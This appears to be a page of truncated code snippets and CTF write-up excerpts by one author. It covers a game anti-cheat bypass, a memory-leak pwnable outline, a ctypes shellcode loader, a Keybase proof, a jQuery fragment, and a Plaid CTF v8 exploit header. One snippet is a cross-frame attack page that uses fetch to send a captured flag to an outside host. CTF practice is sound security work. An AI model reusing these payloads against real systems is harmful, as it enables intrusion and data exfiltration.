itszn

This challenge required that you write cheats for a minecraft clone to bypass a large wall

There are tons of ways to solve this, but here was the main idea.

- There was a function that would on the client side return if a player has certain privileges.
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent)
    o Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯
- You can patch this function to return true, and the client can now toggle these abilities.

However the binary had extra anti-cheat built in

itszn

This challenge was a source only pwnable based on a aliasing bug with -O2. Also not all the source code was given.

Intended solution outline:
- In the source in assignVotes, a voter and a candidate can become aliased, and -02 optimization causes an incorrect return value.
    o If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value.
    o Then when going to print the error message, it instead tries print the votes (if it is > than the address of main)
    o This will print what ever point is given, allowing memory to be leaked up to a null

- Now with an arbitrary read, we can dump the binary and reverse the missing code.
- We can also leak libc addresses and dump libc (or take it from some other challenge)

itszn

Just in Time

300 point
Web
Andrew Fasano

TL;DR;

This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.

itszn

from timeit import timeit
from ctypes import *
'''
libc = CDLL('libc.so.6')

libc.mprotect(0x400000,0x1000,7)
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex')
#s = "\xc3"
libc.memcpy(0x400000, c_char_p(s),len(s))

itszn

Keybase proof

I hereby claim:

• I am itszn on github.
• I am itszn (https://keybase.io/itszn) on keybase.
• I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo

To claim this, I am signing this object:

itszn

301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9

itszn

/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,

itszn

<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) { 
  msg = event.data;
  console.log("attacker got ",msg);
  if (msg.id == 0) {
    a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
  } else if (msg.id == 1) {
    fetch("http://itszn.com/?flag="+msg.output);

itszn

-- TODO: move util functions to common.lua
local charts = {}
local passed = false

local desw = 770
local desh = 800

local moveX = 0
local moveY = 0

itszn

/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */


/* ### Utils, thanks saelo ### */ 

//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//